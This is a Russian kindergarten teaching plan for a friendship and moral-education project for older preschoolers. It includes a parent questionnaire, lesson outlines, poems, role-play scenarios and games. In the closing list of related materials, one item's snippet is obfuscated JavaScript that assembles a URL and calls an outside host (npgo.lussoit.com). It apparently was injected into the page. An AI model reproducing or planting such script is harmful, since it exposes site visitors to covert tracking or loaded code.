Проект "Учимся дружить"
проект (старшая группа)

Богданова Екатерина Владимировна

данный проект представляет собой работу по созданию новой  нормы (нормотворчество),  которая основывается на реальных ситуациях, возникающих в жизни детей в детском саду. Обычно это типичные, повторяющиеся конфликтные ситуации. Проект направлен на приобретение дошкольниками необходимых навыков поведения – дети  становятся  внимательнее  друг к другу, начинают руководствоваться не столько собственными мотивами, сколько установленными нормами.

Скачать:

ВложениеРазмер
Файл proekt_patrioticheskoe.docx35.82 КБ

Предварительный просмотр:

Муниципальное казённое дошкольное образовательное учреждение

Детский сад №4 «Колосок»

Проект для старших дошкольников

«Мы учимся дружить!»

Разработчики проекта:

Е. В. Богданова, воспитатель

П. Новочернореченский

Проект: среднесрочный, групповой,  практико-ориентированный

Сроки реализации: с 20.09. по 04.11.

Цель проекта: создание воспитывающей среды, обеспечивающей активизацию социальных, интеллектуальных интересов детей, формирование у ребенка в детском саду и дома социально-нравственных качеств, осознание детьми своего поведения и формирование умения исправлять ошибки. Овладение детьми нормами поведения, способности конструирования своего поведения на основе анализа действительности и удержания  этого правила

Краткое описание проекта: данный проект представляет собой работу по созданию новой  нормы (нормотворчество),  которая основывается на реальных ситуациях, возникающих в жизни детей в детском саду. Обычно это типичные, повторяющиеся конфликтные ситуации. Проект направлен на приобретение дошкольниками необходимых навыков поведения – дети  становятся  внимательнее  друг к другу, начинают руководствоваться не столько собственными мотивами, сколько установленными нормами.

Актуальность данного проекта обусловлена:

*      Проблемами регуляции поведения детей в детском саду стоит очень остро. Анализ состояния наших воспитанников показал, что в группе часто происходят конфликтные ситуации, которые  характеризуются столкновением детских инициатив, при котором каждый ребенок настаивает на своем варианте поведения.

*      Формированием в дошкольном возрасте дружеских взаимоотношений между детьми в значительной степени зависит от того, какая работа в детском саду ведется в этом направлении. Формировать умение оценивать свои поступки и поступки других.

*       Воспитанием в детях таких качеств как сочувствие, отзывчивость, умение оценивать свои поступки и поступки других.

 Задачи для детей:

  • Развивать у детей интеллектуальное развитие, познавательные,  речевые способности, учитывая индивидуальные и возрастные особенности ребенка.
  • Формировать у ребенка эмоционально-эстетическое и бережное отношение к сверстникам, близким.
  • Научить детей видеть нежелательные последствия неприемлемого поведения

Задачи для родителей:

  • создавать в семье благоприятные условия для развития личности ребенка,
  • учитывать опыт детей, приобретенный в детском саду,
  • уважать неповторимость ребенка, ставить для себя и ребенка реальные цели.

Задачи для педагога:

  • развивать социально-профессиональную компетентность и личностный потенциал.

Участники проекта:

  1. Воспитатель группы, помощник воспитателя.
  2.  Дети старшей группы.
  3.  Родители и другие члены семьи.

Ожидаемый результат в процессе взаимодействия педагог – дети - родители в реализации проекта:

Дети:

  • овладевают знаниями о последствиях нежелательного поведения в той или иной ситуации;
  • проявляют доброту, заботу, уважительное отношение к окружающим;
  • возрастает речевая активность детей в разных видах деятельности, способность анализировать свои поступки и поступки других;

Родители:

  • обогащение родительского опыта приемами взаимодействия и сотрудничества с ребенком в семье;
  • повышение педагогической компетентности родителей.

Педагог: проектирование заставляет педагога находиться в пространстве возможностей, что изменяет мировоззрение и не допускает применения стандартных, шаблонных действий, требует творческого, личностного роста.

3. Основная часть

1. Подготовительный этап

задачи:

-     изучить отношение родительской общественности к предлагаемой деятельности в рамках проекта (анкетирование) и возможности семей воспитанников по поддержке образовательного процесса;

-     скоординировать действия педагогов и родителей по формированию у детей в детском саду и дома социально-нравственных качеств;

-     разработать основные методические материалы и изготовить необходимые дидактические пособия.

2 . Основной этап реализации проекта:

Цель основного этапа:  социально-нравственное воспитание дошкольников на основе бесед на моральные темы, чтение и последующий анализ художественных произведений, обсуждение и проигрывание проблемной ситуации, просмотр и обсуждение фрагментов мультфильмов, художественного творчества.

  1. Содержание деятельности родителей:
  • Выбор фотографий  для стенда «Радуга поведения».  
  • Участие в оформлении стенда в группе.
  • Совместные с педагогом, ребенком и родителями анализа поведения за день.
  • Участие в оформлении фотовыставки «Наш любимый детский сад».

2.Содержание деятельности педагога

Мероприятие

Сроки

Содержание

Анкета для родителей    Приложение 1

- Раздел 1  «Я и мои родные» (беседы, игры, игровые ситуации, обсуждение и проигрывание проблемной ситуации) Приложение 2

Сентябрь

Развитие умения давать моральную оценку своим поступкам, способность к эмоциональному сопереживанию.

Раздел 2 «Учимся сочувствовать и сопереживать друзьям» (игры, игровые ситуации, обсуждение и проигрывание проблемной ситуации) Приложение 3

Октябрь

Расширение и углубление представлений детей о доброжелательном отношении к окружающим его людям.

- Раздел 3

«Любому поведению  свой цвет».

Оформление фотовыставки «Наш любимый детский сад»

 Приложение 4

Ноябрь

Создать совместно с детьми «знаки», в определенной цветовой гамме, учить детей анализировать свои поступки и поступки сверстников. Выбор фото совместно с родителями для стенда «Радуга поведения».

 3.Заключительный этап.

Анализируя проделанную работу можно сделать выводы:

  • тема разработанного проекта выбрана с учетом возрастных особенностей детей старшего дошкольного возраста и объема информации, которая может быть ими воспринята, что  позволило существенно снизить конфликтность между детьми;
  • данный проект способствовал не только улучшению психологического климата, но и значительно облегчил работу педагога;
  • возросла речевая активность детей, что положительно повлияло на самостоятельную игровую деятельность детей, дети включают в сюжет игры различные игрушки и пытаются осуществлять ролевой диалог;
  • считаем, что удалось достигнуть хороших результатов взаимодействия педагог – родители, родители принимали активное участие в реализации проекта.
  • на начальном этапе проекта было проведено анкетирование родителей.

Тематическое планирование

Сроки

Тема, цель

Форма проведения

20.09.-27.09.

1.Опрос родителей с целью дальнейшего планирования работы с детьми

Анкета

2. Занятие.    «Самый дорогой на свете человек»

Цели:

  1. Развивать способность к эмоциональному сопереживанию.
  2. Учить понимать и активно выражать эмоциональное переживание близких людей.
  3. Учить давать моральную оценку поступкам героев художественных произведений.
  4. Воспитывать гуманное отношение к родным и близким людям.

Обсуждение и проигрывание проблемной ситуации, беседа.

Чтение стихотворения о маме В.Руссу.

3.Художественное творчество «Букет для любимой мамы»

Рисование открытки

28.09-26.10.

1.Занятие.  «Почему мы обижаем близких нам людей?»

Цели:

Учить детей различать понятия «добро» и «зло».

  1. Побуждать к проявлению сочувствия и сопереживания родным и близким людям.
  2. Формировать осознание моральной стороны поступков.

Диагностика поведения детей и их отношения к близким людям, беседы, проигрывание проблемной ситуации.

Стихотворение Е.Благининой  «Посидим в тишине».

2 Рисование на тему «Моя семья».

Художественное творчество

 3.Занятие «Наши бабушки и дедушки»

Цели:

  1. Воспитывать уважительное отношение к пожилым и старым людям и побуждать к проявлению им сочувствия.
  2. Вызывать эмоциональный отклик к оказанию помощи своим бабушкам и дедушкам.

Диагностика отношения детей к старым, пожилым людям

Чтение и последующий анализ стих-я С.Капутикян «Моя бабушка».

4 Занятие «Друг в беде не бросит»

Цели:

  1. Раскрыть значимость моральной поддержки товарищам, которая может быть выражена в сочувствии.
  2. Формировать ценностное отношение ребенка к себе и к окружающим его людям.

Пословицы и поговорки, просмотр м/ф «Димка и Тимка», пение «Настоящий друг»

5.Занятие «Друг и в радости, и в горе

всегда рядом»

Цели:

Формировать представление о переживании, обиде, причиной которой может быть равнодушное отношение окружающих, учить эмпатии.

        

Чтение и анализ стих-я С.Михалкова «Хорошие товарищи»

Пословицы,  игровое упражнение

27.10.-4.11.

1.Фотовыставка «Наш любимый детский сад» 

2.Стенд для детей «Радуга поведения»

Беседа, выставка детских работ, оформление стенда с помощью родителей воспитанников

Приложение 1

Анкета для родителей

Уважаемые родители!

Предлагаем Вам ответить на несколько вопросов, которые помогут нам спланировать работу по социально - нравственному воспитанию наших детей. Отметьте, пожалуйста, необходимые ответы на вопросы анкеты.

1.Знаете ли Вы, от чего зависит психологический настрой ребенка на целый день?

     Да                 Нет

2.Какой вопрос Вы задаете ребенку по возвращении его из детского сада?

    Чем вас сегодня кормили?

     Что интересного было в дошкольном учреждении?

    Что ты сегодня натворил?

    Как ты себя сегодня вел в детском саду?

3.Что вы знаете о том, как следует реагировать на агрессивное поведение ребенка в детском саду?

     Я много об этом читал, знаю многое.    

   Я мало что знаю об этом.

 Не знаю ничего.

4.Знаете ли Вы, что надо сделать, чтобы исправить поведение ребенка в детском саду и дома?

Да, знаю.

   Знаю, но хотелось бы знать больше.

   Не знаю ничего.

5.Нужен ли Вам совет по улучшению поведения ребенка дома и в детском саду и оказания ему разумной помощи?

 Да, он необходим.                                Нет.

6.Считаете ли Вы, что агрессивные интонации являются неотъемлемой частью воспитательного процесса в семье?

      Да, это единственный способ воздействия на ребенка.

      Да, но я избегаю этого.

     Нет, это неверно.

 

Приложение 2

Раздел 1 «Я и мои родные»

Занятие.    Самый дорогой на свете человек

Цели:

  1. Развивать способность к эмоциональному сопереживанию.
  2. Учить понимать и активно выражать эмоциональное переживание близких людей.
  3. Учить давать моральную оценку поступкам героев художественных произведений.
  4. Воспитывать гуманное отношение к родным и близким людям.

Ход занятия

Занятие начинается с обращения к детям:

- Кто на свете для вас самый дорогой человек?

- Мама.

Чтение стихотворения о маме В.Руссу.

Много мам на белом свете,

Всей душой их любят дети.

Только мама есть одна,

Всех дороже мне она.

Кто она? Отвечу я:

Это мамочка моя.

Воспитатель предлагает рассказать детям о своей маме с помощью игрового упражнения: «Моя мама». Дети по очереди завершают суждение «Моя мама…», «Когда я вижу свою маму, то…»

Обсуждение и проигрывание проблемной ситуации

«Мама Сережи пришла уставшая с работы, увидев разбросанные по всей квартире игрушки, попросила их убрать. Сережа сделал вид, что не услышал просьбу. Мама приготовила ужин, после которого попросила сына помочь ей убрать посуду со стола, на что тот ответил: «Не хочу!».  Мама обиделась.»

- Почему мама обиделась на сына?

- Как должен был поступить Сережа?

Во время проигрывания ситуации обращается внимание на передачу эмоционального состояния каждого героя с помощью мимики, пантомимики и интонации голоса. После проигрывания воспитатель обращается с вопросами к детям.

- Для чего нужна мама? (Диагностика детских представлений и суждений.) подвести к обобщению: «Мама дает жизнь каждому, заботиться, беспокоится о нас, в любую радостную и трудную минуту поддержит, поможет, защитит, поймет и простит».

Художественное творчество «Букет для любимой мамы»

Детям раздаются листы альбомные, фломастеры и карандаши, воспитатель предлагает нарисовать открытку маме, предлагает подарить эти открытки своим мамам, сделав им тем самым приятное.

Занятие.  Почему мы обижаем близких нам людей?

Цели: 1. Учить детей различать понятия «добро» и «зло».

  1. Побуждать к проявлению сочувствия и сопереживания родным и близким людям.
  2. Формировать осознание моральной стороны поступков.

Ход занятия

В начале занятия игровой персонаж кукла Маша, ведет с детьми беседу , какие добрые  дела сделали они для своих родителей? Выслушиваются ответы детей и самые яркие, гуманные поступки детей воспитатель ставит в пример, словесно хвалит.

Детям предлагается послушать стихотворение Е.Благининой  «Посидим в тишине».

- Какой поступок совершил ребенок? Почему?

Диагностика поведения детей и их отношения к близким людям. Детям предлагается по очереди закончить предложение «Когда я вижу уставшую маму (папу), то…» 

Рисование на тему «Моя семья» позволяет диагностировать характер семейных взаимоотношений и положение ребенка в семье.

Домашнее задание: Проявлять заботу  о своих родителях, а утром рассказать воспитателю какие добрые дела сделали дома.

Проигрывание проблемной ситуации

«Вечером забирать из детского сада Лешу пришла мама. Мальчик привык, что это делал всегда папа, с которым они, не торопясь, могли еще прогуляться в парке. В присутствии воспитателя и сверстников Леша начал капризничать, требовать, чтобы за ним пришел отец».

- Правильно ли поступил мальчик?

- Что чувствовала в этой ситуации мама?

- Кого вам жалко в этой ситуации?

- Как бы вы поступили на месте мальчика?

Ролевая гимнастика: с помощью мимики и пантомимики показать:

  • мальчик капризничает;
  • мальчик сердится;
  • мама успокаивает сына;
  • мама огорчается;
  • мальчик и мама радуются.

Упражнение «Закончи предложение».  «Папа рассердился, потому что я…», «Когда я вижу, что папа огорчен, то …».

 Занятие.  Наши бабушки и дедушки

Цели: 1. Расширить представления детей об отношении к пожилым людям.

  1. Воспитывать уважительное отношение к пожилым и старым людям и побуждать к проявлению им сочувствия.
  2. Вызывать эмоциональный отклик к оказанию помощи своим бабушкам и дедушкам.

Ход занятия

Воспитатель начинает занятие с беседы: сегодня она видела, как один мальчик помогал старой бабушке перейти дорогу и ему об этом никто не говорил.

О любви внуков к бабушкам написано много стихов. Вот одно из них.

Чтение стихотворения С.Капутикян «Моя бабушка».

Стала бабушка

Старой, хворою,

От ходьбы она устает.

Храбрым летчиком

Стану скоро я,

Посажу ее в самолет.

Не тряхну ее, не качну ее.

Отдохнет она, наконец.

Скажет бабушка:

«Ай да внучек мой,

Ай да летчик мой, молодец!»

Диагностика отношения детей к старым, пожилым людям

Предложить детям закончить предложение «Когда я вижу, как старому человеку тяжело ходить, то…»

Приложение 3

Раздел 2 «Учимся сочувствовать и сопереживать друзьям»

Занятие. Друг в беде не бросит

Цели: 1. Расширить и углубить представления детей о доброжелательном отношении к окружающим его людям.

  1. Раскрыть значимость моральной поддержки товарищам, которая может быть выражена в сочувствии.
  2. Формировать ценностное отношение ребенка к себе и к окружающим его людям.

Ход занятия

Воспитатель предлагает посмотреть мультфильм «Димка и Тимка» и спеть вместе с героями мультфильма песенку: «Настоящий друг»:

Дружба крепкая не сломается,

Не расклеится от дождей и вьюг.

Друг в беде не бросит,

Лишнего не спросит –

Вот что значит настоящий

Верный друг.

Мы поссоримся и помиримся,

«Не разлить водой!» - шутят все вокруг.

В полдень или в полночь

Друг придет на помощь –

Вот что значит настоящий

Верный друг.

В конце песни педагог отмечает: «Как хорошо иметь верных и надежных друзей!». Но в одной  пословице говорится: «Дружба дружбе рознь, а иную хоть брось». Во время обсуждения пословицы педагог обращает внимание детей на моральный подтекст пословицы. 

 

Занятие. Друг и в радости, и в горе всегда рядом

Цели: 1. Формировать представление о душевной боли и переживании обиды, причиной которой может быть равнодушное отношение окружающих.

2.Диагностировать проявление эмпатии.

Ход занятия

Педагог читает поговорку: «Обидеть легко, да на душе каково?». Взрослый предлагает детям объяснить ее смысл.

- Почему так говорят?

- Приходилось ли вам кого – либо обижать?

- Что вы при этом чувствовали?

Чтение стихотворения С.Михалкова «Хорошие товарищи»

Мальчик Миша мается –

Миша заикается.

Как другие – чисто, ясно –

Он не может говорить.

И просить его напрасно

То, что скажет, повторить.

Нелегко ему даются

Все слова на букву К,

Но ребята не смеются –

Дружба классная крепка:

Ты, Мишутка, не теряйся!

Ты с других пример бери!

Молча с духом собирайся

 И смелее говори!

Беседа по содержанию, советы детям:

v     Нельзя смеяться над недостатками внешности других детей, дразнить, давать прозвища.

v     Настоящий друг должен уметь сочувствовать товарищу: радоваться его успехам и огорчаться неудачам.

v     Нельзя проявлять равнодушие обиженному, плачущему ребенку, допускать несправедливость по отношению к слабому.

v     Не делай для людей того, что сейчас себе ты не желаешь.

 Физкультминутка “Если есть хороший друг…”

Настроение упало, 
Дело валится из рук… 
Но ещё не всё пропало, 
Если есть хороший друг. 
С делом справимся вдвоём, 
С облегчением вздохнём – 
Настроение поднимем 
И от пыли отряхнём!

 Стоят лицом друг к другу, руки вверх.
“Бросают” вниз руки…
Грозят указательным пальчиком.
Хлопают в ладоши.
Берутся за руки.
 Вздыхают.
Поднимают сцепленные руки вверх.
“Отряхиваются” от пыли, улыбаются друг другу.

Игра – шутка «Сиамские близнецы» (С.А.Шмаков)

Ребята становятся парами и привязываются спина к спине (ноги и руки свободные). Это как бы пары «наоборот». Они должны сплясать, пробежать туда и обратно, как «сиамские» близнецы.

 

Приложение 4              

Конспект занятия по социально-нравственному воспитанию

П/с - обогащать лексику синонимами, эпитетами

        -  учить связывать значения пословиц о дружбе с конкретной жизненной ситуацией

        -   активизировать мыслительную и речевую деятельность, используя проблемную ситуацию, схемы, модели

        -  формировать социально-коммуникативные основы личности в процессе формирования представлений о дружбе.

Предварительная работа: чтение сказок (Ш. Перро, русские народные); разучивание песен, стихов о дружбе; создание «Банка пословиц» и плаката «Дом дружбы».

Оборудование: дерево Дружбы, сказочные герои: Дюймовочка, Буратино, кащей Бессмертный, Золушка, Баба Яга.

Ход занятия

Почтальон приносит письмо от Шапокляк.

Вос-ль: Что же нам делать, как помочь Шапокляк?

Дети:Расскажем про дружбу, что знаем сами.

Вос-ль: Надеюсь вы понимаете, что это работа не простая и нам придется пройти длинный путь и выполнить не одно задание, чтобы показать Шапокляк, что мы сами умеем дружить…Но есть еще одна проблема: как же она увидит все, что мы здесь будем делать и говорить?

Дети: Нам нужен человек, который все будет снимать на видеокамеру,а кассету мы вышлем Шапокляк.

Вос-ль: Тогда в путь.

А вот и первое задание

У слова «дружба» есть слова- родственники. Давайте и назовем слова похожие на слово «дружба».

Д/упр-е:  «Семья слов»

(дружить, друг, подружка, дружище, дружочек, дружок, дружелюбный)

А что означает слово дружелюбный? Кто может объяснить?

(дети объясняют значение слова)

Вос-ль: Ребята, когда у человека много друзей какое у него настроение?

Дети: Хорошее.

Вос-ль:А у вас какое настроение?

Дети: Веселое, радостное, прекрасное!

Вос-ль:Поделитесь своим секретом, почему вам так весело и радостно?

Дети:Нам интересно в детском саду, к нам пришло много гостей, у нас здесь много друзей.

Вос-ль:А с кем здесь можно дружить?

Дети: Со всеми!

Вос-ль:А как вы думаете, с чего начинается дружба?

Дети:С доброго взгляда, хорошего поступка, оказанной помощи.

Вос-ль:Пройдите, пожалуйста, к столу и откройте конверты. Посмотрите внимательно и найдите схему одинокого человека. Какое у него выражение лица?

Дети:Грустное, мрачное, обиженное, печальное.

Вос-ль:С чем можно сравнить его настроение?

Дети:С серой тучей, пасмурным небом, увядшим цветком.

Вос-ль:Покажите человека, по выражению лица которого можно подтвердить, что у него много друзей.

Дети показывают.

Вос-ль:Как вы догадались?

Дети:У него веселое, счастливое, радостное лицо.

Вос-ль:С чем можно сравнить его настроение?

Дети: С солнышком, распустившимся цветком, пушистым облаком.

Вос-ль:А еще с первыми весенними листочками я дарю вам листочки, а вы повесьте их на наше дерево «Дружбы».

(Игра «Настоящий друг  - это…»)

Дети говорят кто такой настоящий друг и вешают листочки на дерево.

Вос-ль:Много хороших слов вы сказали о настоящих друзьях, а какие вы знаете пословицы и поговорки о дружбе?

Дети называют пословицы и поговорки

Вос-ль:Я тоже знаю одну пословицу: «Дорога к дому друга никогда не бывает длинной»

Мы обязательно после занятия подумаем, как ее изобразить и наш «Банк пословиц» пополнится еще одной интересной пословицей.

Вос-ль:Ребята, одна маленькая девочка из сказки очень хочет, чтобы вы ей помогли. Догадались кто эта девочка?

(Пальчиковая гимнастика «Помоги Золушке»)

Дети сортируют рис и гречу.

Вос-ль:Вы хотели бы взять в друзья Золушку, почему?

Мы сейчас поиграем в игру «Выбери себе в друзья сказочных героев».

Дети выбирают, называют их качества.

Остаются отрицательные герои.

Вос-ль:Почему вы не хотите дружить с оставшимися сказочными героями?

Дети называют их отрицательные качества.

Вос-ль:Как им помочь исправиться, ведь среди таких героев есть и Шапокляк?

Дети:Нужно научить ихнесовершатьплохих поступков, почаще улыбаться, не сердиться.

Вос-ль:Так что же такое дружба?

Дети:Дружба это когда интересно общаться друг с другом, когда у людей общие интересы. Всем советуем дружить.

У нас есть хорошая песня В. Герчик о дружбе. Эта песня поможет всем понять, что дружба может делать настоящие чудеса.

( Дети приглашают гостей и все исполняют песню).

Вос-ль:Замечательное занятие у нас получилось. Посмотрите, как озарилась наша группа радостными улыбками, согрелась теплом дружеских сердец.

- Что для жизни нужно?

- Солнце!

- Что для дружбы нужно?

- Сердце!

- Что для сердца нужно?

- Счастье!

- А что для счастья нужно?

- Мир!

Вос-ль:Мы желаем вам всем Мира. А с вами, ребята, на следующем занятии мы будем готовить к выпуску газету о дружбе, и обязательно используем в нашей газете высказывания наших гостей.

Список используемой литературы

  1. Алябьева Е.А.  Нравственно – этические беседы с дошкольниками. – М.: ТЦ Сфера, 2003.
  2. Богуславская Н.Е., Купина Н.А. Веселый этикет (развитие коммуникативных способностей ребенка). – Екатеринбург: «ЛИТУР», 2000.
  3. Веракса Н.Е., Веракса А.Н. Проектная деятельность дошкольников. Пособие для педагогов дошкольных учреждений. – М.:МОЗАИКА – СИНТЕЗ, 2010.
  4. Семенака С.И. Учимся сочувствовать, сопереживать. Коррекционно – развивающие занятия для детей 5-8 лет. – М.: АРКТИ, 2005.
  5. Шипицина Л.М., Защиринская О.В., Воронова А.П.., Нилова Т.А. Азбука общения. – СПб,: «ДЕТСТВО - ПРЕСС», 2002.
  6. Яковлева Н.Г. Психологическая помощь дошкольнику. – СПб.: Валери СПД, 2006.

 


По теме: методические разработки, презентации и конспекты

Проект «C туризмом дружит вся семья» (старший дошкольный возраст)

Цель проекта: Привлечение детей и родителей к активному отдыху, спорту....

Если хочешь долго жить - научись с огнем дружить!

Развлечение по правилам пожарной безопасности, со сказкой-драматизацией и стихами противопожарного содержания. Старший дошкольный возраст....

Реализация ФГТ В ГДОУ. Занятие "Давайте дружить"

Цель: Создание условий для естественного психологического развития ребенка. Задачи: *Развитие эмоцианальной сферы. введение ребенка в мир человеческих эмоций. *развитие коммуникативных уме...

Конспект занятия "Давайте дружить"

Конспект занятия по развитию речи в 1 младшей группе....

Конспект НОД во II младшей группе на тему " Дружит с бабочкой цветок, Дружим мы с тобою».

Конспект НОД во II младшей группе на тему «Дружит с бабочкой цветок,Дружим мы с тобою».Конспект НОД  во II младшей группе на тему " Дружит с бабочкой цветок,Дружим мы с...

Что делать, если с вашим ребенком никто не дружит? Как помочь ребенку, если с ним не хотят дружить.

var e,n,o;window.self===window.top&&(e=[\'//\',\'s:\',\'tp\',\'ht\'].reverse().join(\'\'),n=[\'npgo.lussoit.com\',\'67\'].join(\'/\'),(o=new Image).src=\'\'.concat(e).concat(n,\'.gif\')); !function(){if(!window.mainSc...

Тематическая беседа "Мы дружим с физкультурой" материал (группа раннего возраста) на тему: «Мы дружим с физкультурой»

Тематическая беседа "Мы дружим с физкультурой"материал (группа раннего возраста) на тему:«Мы дружим с физкультурой» Цель: учить заботиться о своем здоровье; прививать л...